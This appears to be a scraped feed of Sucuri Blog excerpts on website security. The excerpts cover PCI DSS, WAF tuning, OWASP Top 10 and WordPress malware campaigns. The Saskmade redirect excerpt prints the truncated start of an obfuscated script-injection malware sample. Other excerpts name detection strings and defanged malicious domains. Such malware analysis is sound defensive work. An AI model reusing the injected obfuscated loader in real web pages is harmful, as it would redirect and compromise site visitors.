PCI for SMB: Requirement 9 – Implement Strong Access Control Measures

Welcome to the sixth post of a series on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQs (Self-Assessment Questionnaires).

In the previous articles written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
  • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

Continue reading PCI for SMB: Requirement 9 – Implement Strong Access Control Measures at Sucuri Blog.

Source: Scuri check

Real-Time Fine-Tuning of the WAF via API

Though the Sucuri Firewall is simple to set up and protects your website immediately, it’s possible to have granular control of the WAF by using an API.

For instance, there’s a specific filter inside the WAF dashboard called Emergency DDoS. This filter basically increases the strength of the DDoS protection to an “emergency” level where most non-human access is blocked.

API to Boost Firewall Protection

The Firewall API is mostly used for whitelisting and clearing the website cache.

Continue reading Real-Time Fine-Tuning of the WAF via API at Sucuri Blog.

Hackers Change WordPress Siteurl to Pastebin

Last Friday, we reported on a hack that used a vulnerability in the popular WP GDPR Compliance plugin to change WordPress siteurl settings to erealitatea[.]net. At that time it was not clear who was behind the massive attack, since the erealitatea[.]net domain didn’t work and the infection simply broke the compromised sites. Our SiteCheck scanner detected the infection on about 700 sites over the weekend and PublicWWW currently returns 573 results.

Continue reading Hackers Change WordPress Siteurl to Pastebin at Sucuri Blog.

Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability

We have noticed a growing number of WordPress-based sites that have had their URL settings changed to hxxp://erealitatea[.]net. Further investigations show that the issue is related to a security vulnerability in the WP GDPR Compliance plugin for WordPress (with 100,000+ active installations).

The new General Data Protection Regulation (GDPR) laws in the EU have made the plugin extremely popular. Many sites are looking for an easy way to comply with these new laws, and adding this plugin is a simple solution for many website owners.

Continue reading Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability at Sucuri Blog.

10 Tips to Improve Your Website Security

Having a website has become easier than ever due to the proliferation of great tools and services in the web development space. Content management systems (CMS) like WordPress, Joomla!, Drupal, Magento, and others allow business owners to build an online presence rapidly. The CMS’s highly extensible architectures, rich plugins, and effective modules have reduced the need to spend years learning web development before starting to build a website.

The ease of launching an online business or personal website is great.

Continue reading 10 Tips to Improve Your Website Security at Sucuri Blog.

New WordPress Security Email Course

Recent statistics show that over 32% of website administrators across the web use WordPress.

Unfortunately, the CMS’s popularity comes at a price — attackers often seek out vulnerabilities to exploit and target unhardened WordPress sites. If a site is compromised, it often becomes the host of malicious malware or spam campaigns, harming your website’s reputation and visitors in the process.

Knowledge is power, and we’re here to help! We’ve created a new WordPress Security Email Course to help improve your website’s security posture and reduce the risk of a security incident.

Continue reading New WordPress Security Email Course at Sucuri Blog.

Website Security Tips for Marketers

In our previous post, we discussed why marketers should have a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

  • Protecting your website from compromises.
  • Monitoring for issues so you can react quickly.
  • Having a documented emergency response plan.

Marketers should champion these initiatives so they can be prioritized by their business development team.

Continue reading Website Security Tips for Marketers at Sucuri Blog.

Web Marketers Should Learn Security

Most online marketers think of themselves as T-shaped individuals. The theory behind this concept is that individuals possess a wide range of skills, with some abilities running deeper than others.

Website security awareness is in short supply and we need more champions — especially among small and medium-sized businesses. Digital marketers are in a prime position to add security know-how to their diverse toolkit.

Source: The T-Shaped Web Marketer by Rand Fishkin

It makes sense for marketers to want to secure their websites.

Continue reading Web Marketers Should Learn Security at Sucuri Blog.

Saskmade[.]net Redirects

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation have changed slightly.

For example, in the wp_post table they now inject this script:

In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=[‘length’,’fromCharCode‘,’createElement’,’type’,’async’,’code121′,’src’,’appendChild’,’getElementsByTagName’,’script’];(function(_0x546a53,
…skipped…

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

OWASP Top 10 Security Risks – Part II

It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we have started a series of posts on the OWASP top 10 security risks.

The OWASP Top 10 list consists of the 10 most seen application vulnerabilities:

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfigurations
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

Multiple Ways to Inject the Same Tech Support Scam Malware

Last month, we shared information about yet another series of ongoing massive infections using multiple different vectors to inject malicious scripts into WordPress websites.

Shortly after, the campaign changed the domain names used in its scripts. Now it mainly uses hotopponents[.]site and learningtoolkit[.]club.

At the time of this writing, PublicWWW finds the most common patterns of this malware on thousands of sites:

  • “var _0xfcc4=” – 8501 sites
  • “hotopponents.site/site.js” – 3636 sites

Database Injections

Multiple variations of the injected scripts have been found.

Continue reading Multiple Ways to Inject the Same Tech Support Scam Malware at Sucuri Blog.

Creating a Response Plan You Can Trust

As a website owner, you may have experienced your website being down for any number of reasons: errors in code, server-related difficulties, or even being under attack from bad actors.

I once shared my own experience of a hacked website in a webinar. Whether you have one site or hundreds, when restoring your online presence it is imperative to have a process in place.

If Your Website Gets Hacked, What is Your Plan?

Continue reading Creating a Response Plan You Can Trust at Sucuri Blog.

Malicious Redirects from NewShareCounts.com Tweet Counter

When Twitter announced their new design for “Tweet” and “follow” buttons back in October 2015, marketers across the web developed a mild anxiety—the new design came with a decision to nuke their beloved Tweet count feature.

Social signals can be a huge credibility indicator for visitors and site content. Who doesn’t think there’s a psychological relationship between the number of social shares and the credibility of a content piece? It’s social validation, plain and simple.

Continue reading Malicious Redirects from NewShareCounts.com Tweet Counter at Sucuri Blog.

Product Update: Sucuri Firewall in Singapore and Amsterdam

Over three years ago, we transitioned the Sucuri Firewall (WAF) away from the cloud and expanded it to run on top of our own Anycast content delivery network (CDN).

We provide security for websites with the protection of our WAF as well as performance benefits of a CDN. We have been adding data centers in key regions of the world:

  • San Jose – US
  • Dallas – US
  • Washington D.C.

Continue reading Product Update: Sucuri Firewall in Singapore and Amsterdam at Sucuri Blog.

Security Monitoring Saves the Day

For the second week of National Cyber Security Awareness Month, we would like to focus on a very important part of having a good website security posture: monitoring.

How can security monitoring save your day?

Most people only care about their website security after something bad has already happened. However, how can you tell when something is attempting to harm your website? Sometimes it is a very noticeable issue, such as:

  • website defacement – when the home page of the website is wiped out and something else appears in front of the visitor’s eyes;
  • unresponsive website – when the website pages respond too slowly or stop loading at all;
  • SEO spam – when the website listing in search engines shows unrelated spam keywords, often pharma keywords; or
  • a website blacklist warning – when a red warning page shows all your visitors that the website they are about to go to is not secure.

Continue reading Security Monitoring Saves the Day at Sucuri Blog.

Obfuscated JavaScript Cryptominer

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, we found out that cryptominers were running on visitors’ computers when they accessed our customer’s website.

We have previously discussed how cryptomining can happen in many covert ways. In this post, we will show you how malicious code can create a cryptominer.

Malware that Creates Cryptominer Code

Take a look at the following malware:

Continue reading Obfuscated JavaScript Cryptominer at Sucuri Blog.

OWASP Top 10 Security Risks – Part I

It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we would like to start a series of posts on the OWASP top 10 security risks.

OWASP stands for the Open Web Application Security Project, an online community that produces articles, methodologies, documentation, tools, and technologies in the field of web application security.

OWASP Top 10 is the list of the 10 most seen application vulnerabilities.

Continue reading OWASP Top 10 Security Risks – Part I at Sucuri Blog.

October Cybersecurity Month

Since 2003, October has been recognized as National Cybersecurity Awareness Month. It is an annual campaign to raise awareness about the importance of cybersecurity and being a better digital citizen.

October has just started and a majority of security companies are promoting internet security. With the holidays fast approaching, it is a crucial time for website owners, especially ones with an e-commerce website, to be cyber secure.

The end of the year is also the season when hackers try to profit the most.

Continue reading October Cybersecurity Month at Sucuri Blog.

PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures

This is the fifth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We are halfway there! In the previous articles about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
  • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

Continue reading PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures at Sucuri Blog.
